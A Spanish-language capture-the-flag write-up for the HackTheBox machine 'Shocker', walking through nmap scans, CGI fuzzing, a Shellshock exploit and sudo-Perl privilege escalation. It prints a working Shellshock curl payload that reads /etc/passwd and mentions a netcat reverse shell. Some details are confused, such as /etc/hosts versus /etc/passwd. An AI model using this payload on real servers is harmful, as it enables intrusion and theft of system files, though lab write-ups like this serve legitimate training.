Shocker - HackTheBox
Comence efecutando un escaneo con Nmap
para identificar los puertos abiertos de la maquina.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 -v -Pn -n 10.10.10.56 -oG allPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 15:48 CEST
Initiating SYN Stealth Scan at 15:48
Scanning 10.10.10.56 [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed SYN Stealth Scan at 15:48, 0.47s elapsed (1000 total ports)
Nmap scan report for 10.10.10.56
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
Raw packets sent: 1038 (45.672KB) | Rcvd: 1018 (40.728KB)
Tambien hice otro escaneo para verificar la version y servicio de cada puerto abierto.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sC -sV -p80,2222 10.10.10.56 -oN targeted
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 15:48 CEST
Nmap scan report for 10.10.10.56
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds
Al parecer solo tenía dos puertos, empece por el servidor web, poco podía hacer en el servicio SSH, se veía esto.
No encontré nada, por lo que recurrí a hacer un “fuzzing” con WZFuzz
.
Encontré un /cgi-bin/
, esto parecía un shellshock
en toda regla, fuzze con wfuzz
, para ver si podía encontrar un script en bash.
Y si, encontré un script llamado user.sh
, para confirmar que era un shellshock
hice uso del script exploit-deface.sh y efectivamente era vulnerable a shellshock
, ejecute el siguiente comando enviando una petición por GET por curl
para ver si me devolvía el /etc/hosts
.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ curl http://10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
Si, me devolvió el contenido del /etc/hosts
, ahora solo faltaba acceder a la máquina, me entable una reverse Shell por “netcat” por el puerto 443
y accedí.
ESCALADA DE PRIVILEGIOS
Ahora solo faltaba la escalada de privilegios, para ello hice sudo -l
, vi que podía ejecutar Perl con privilegios root
, me dirigí a gftobing para ver si podía escalar privilegios de alguna manera con Perl, al parecer si podía.
Ejecute el comando con sudo
y me otorgo permisos de superusuario.
Leave a comment